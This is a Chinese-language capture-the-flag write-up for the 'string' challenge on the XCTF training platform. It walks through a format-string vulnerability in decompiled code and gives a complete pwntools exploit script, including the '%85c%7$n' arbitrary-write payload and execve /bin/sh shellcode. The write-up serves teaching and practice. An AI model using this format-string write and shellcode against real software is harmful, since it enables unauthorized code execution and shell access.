攻防世界-string-Writeup

string

[collapse title=“展開查看詳情” status=“false”]

考點：格式化字符串任意地址寫小數

題目前面有幾個條件循環繞過，反編譯就能看出，不再贅述。看漏洞函數：

unsigned __int64 sub_400BB9()
{
  int v1; // [rsp+4h] [rbp-7Ch]
  __int64 v2; // [rsp+8h] [rbp-78h]
  char format; // [rsp+10h] [rbp-70h]
  unsigned __int64 v4; // [rsp+78h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  v2 = 0LL;
  puts("You travel a short distance east.That';s odd, anyone disappear suddenly");
  puts(", what happend?! You just travel , and find another hole");
  puts("You recall, a big black hole will suckk you into it! Know what should you do?");
  puts("go into there(1), or leave(0)?:");
  _isoc99_scanf((__int64)"%d", (__int64)&v1);
  if ( v1 == 1 )
  {
    puts("A voice heard in your mind");
    puts("';Give me an address';");
    _isoc99_scanf((__int64)"%ld", (__int64)&v2);
    puts("And, you wish is:");
    _isoc99_scanf((__int64)"%s", (__int64)&format);
    puts("Your wish is")


;
    printf(&format, &format);                   // 格式化字符串漏洞
    puts("I hear it, I hear it....");
  }
  return __readfsqword(0x28u) ^ v4;
}

可控制的第一個參數是在 18 行，偏移爲 7 。這裏利用方式有多種，利用偏移 7 和 8 控制任意寫入，也可只利用偏移 8 任意輸入。（exp 使用偏移 7 和 8）

修改 v3 值後，繞過最後一個障礙。然後寫入一段 shellcode 即可。shellcraft 生成的沒有效果，就去 http://shell-storm.org/ 找了一個。

完整 exp ：

from pwn import *

context.log_level = ';debug';

p = remote("111.198.29.45",48602)
#p = process("./string")

p.recvuntil("secret[0] is ")
v3 = int(p.recvuntil(';\n';,drop=True),16)
log.success("v3:"+hex(v3))

p.recvuntil("secret[1] is ")
v3_1 = int(p.recvuntil(';\n';,drop=True),16)
log.success("v3_1:"+hex(v3_1))

#payload = "aaaaaaaa%p%p%p%p%p%p%p%p%p"
#offset = 7
payload = "%85c%7$n"

p.recvuntil("name")
p.sendline(';a';*0xc)

p.recvuntil("up?:")
p.sendline("east")

p.recvuntil("leave(0)?:")
p.sendline(str(1))

p.recvuntil("address")
p.sendline(str(v3))

p.recvuntil("is:")
p.sendline("%85c%7$n")

#shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
shellcode = "\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"

p.recvuntil("USE YOU SPELL")
p.sendline(shellcode)

p.interactive()

[/collapse]